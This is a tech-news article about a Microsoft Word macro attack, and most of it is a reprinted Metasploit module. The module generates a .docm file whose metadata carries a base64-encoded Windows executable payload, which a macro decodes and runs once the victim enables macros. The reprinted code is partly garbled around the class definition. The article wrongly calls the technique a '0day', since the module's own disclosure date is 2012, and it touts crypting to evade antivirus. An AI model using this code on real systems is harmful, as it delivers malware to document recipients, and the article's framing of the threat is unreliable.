• Home
  • About Us
  • Authors
  • Submit News
  • Contact Us
  • Privacy Policy
  • Sitemap
The Hack Post
  • Hacking News
    • Cyber Crime
  • Cyber Security
  • Technology
    • Internet
  • Entertainment
    • Gaming
  • Business
  • Science / Health
No Result
View All Result
The Hack Post
No Result
View All Result

Microsoft Word Macro Execution 0day Exploit Found

Alizaib Hassan by Alizaib Hassan
February 9, 2017
Microsoft Word Macro Execution 0day Exploit Found
Share on FacebookShare on Twitter

An exploit in Microsoft Office Word has been discovered allowing hackers to execute malicious macro-based codes. Attackers can run the exploit in Metasploit and embed a macro virus into a Microsoft Word document.

According to WikiPedia:

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, Excel, Power point allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in e-mails. Many antivirus programs can detect macro viruses, however they are still difficult to detect and its spread from the network.

A hacker injecting this exploit into a network of computers can be destructive. A virus such as this can spread like bacteria in a petri-dish. Especially in this day and age where files are always transferred from one computer to another, not just in schools but also at work places and of course amongst friends and families. The virus can spread to millions of computers within just a few months, weeks, days or even hours.

The exploit was uploaded to an exploit database by an internet user going by the alias of sinn3r, with the whole code being available for anyone to use. It is unsure whether sinn3r is the original author of the exploit as of yet.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'

class MetasploitModule "Microsoft Office Word Malicious Macro Execution",
'Description' => %q{
This module generates a macro-enabled Microsoft Office Word document. The comments
metadata in the data is injected with a Base64 encoded payload, which will be
decoded by the macro and execute as a Windows executable.

For a successful attack, the victim is required to manually enable macro execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r' # Metasploit
],
'References' =>
[
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Targets' =>
[
['Microsoft Office Word', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 10 2012",
'DefaultTarget' => 0
))

register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
], self.class)
end

def on_file_read(short_fname, full_fname)
buf = File.read(full_fname)

case short_fname
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(generate_payload_exe)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end

# The original filename of __rels is actually ".rels".
# But for some reason if that's our original filename, it won't be included
# in the archive. So this hacks around that.
case short_fname
when /__rels/
short_fname.gsub!(/\_\_rels/, '.rels')
end

yield short_fname, buf
end

def package_docm(path)
zip = Rex::Zip::Archive.new

Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')

if File.directory?(file)
print_status("Packaging directory: #{file}")
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}")
zip.add_file(fname, buf)
end
end
end

zip.pack
end

def exploit
print_status('Generating our docm file...')
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
docm = package_docm(path)
file_create(docm)
super
end
end

Viruses embedded into other forms and formats of files can also be easily go unnoticed by anti-viruses. Silent viruses and macro viruses such as this one can easily be made undetectable by a method called crypting. Methods such as these have existed since the very first virus was ever created. With time, hackers have gotten smarter and so have their destructive viruses and methods of undetectability.

Tags: Microsoft Word Exploit
Alizaib Hassan

Alizaib Hassan

Writer and content creator at The Hack Post. My adamant love for blogging, web development and programming has made me realise that contributing what I know is not only educative but also fun. Discussing topics with others is what drove me to become an author and I love every single moment of it. Founder of www.azhblog.com

Next Post
Australian, New South Wales Government County Council Hacked by NeT.Defacer

Australian, New South Wales Government County Council Hacked by NeT.Defacer

Latest Articles

10 Smart Ways to Save Money on Food Without Sacrificing Quality
news

10 Smart Ways to Save Money on Food Without Sacrificing Quality

June 26, 2025
5 Condo Kitchen Hacks for Faster Meals
news

5 Condo Kitchen Hacks for Faster Meals

June 21, 2025
Colorful Candy Games That Offer Nonstop Entertainment
Entertainment

Colorful Candy Games That Offer Nonstop Entertainment

June 18, 2025
Future-Proofing Your Health The Smarter Way to Use Hospitals Today
Science / Health

Future-Proofing Your Health: The Smarter Way to Use Hospitals Today

June 16, 2025
What Tenants Look For in a Condo Rental Today
Business

What Tenants Look For in a Condo Rental Today

June 12, 2025
5 Tips for Working Alongside Your Furry Pal
news

5 Tips for Working Alongside Your Furry Pal

June 10, 2025
GC Coupons The Most Reliable Platform for Airalo, Jetpac, and GlobalYo Coupons
Technology

GC Coupons: The Most Reliable Platform for Airalo, Jetpac, and GlobalYo Coupons

June 10, 2025
6 Tips for Creating a Kid-Safe Condo
news

6 Tips for Creating a Kid-Safe Condo

June 4, 2025
5 Benefits of Outdoor Time for Kids
Entertainment

5 Benefits of Outdoor Time for Kids

May 26, 2025
Is App Design and Development Necessary for Your Company?
Technology

Is App Design and Development Necessary for Your Company?

May 26, 2025
Simple Chores for Kids to Do In Your Condo
news

Simple Chores for Kids to Do In Your Condo

May 22, 2025
Home Meditation Mindful Moments and Modern Tech
news

Home Meditation: Mindful Moments and Modern Tech

May 17, 2025
  • Home
  • About Us
  • Authors
  • Submit News
  • Contact Us
  • Privacy Policy
  • Sitemap

The Hack Post © 2019

No Result
View All Result
  • Hacking News
    • Cyber Crime
  • Cyber Security
  • Technology
    • Internet
  • Entertainment
    • Gaming
  • Business
  • Science / Health

The Hack Post © 2019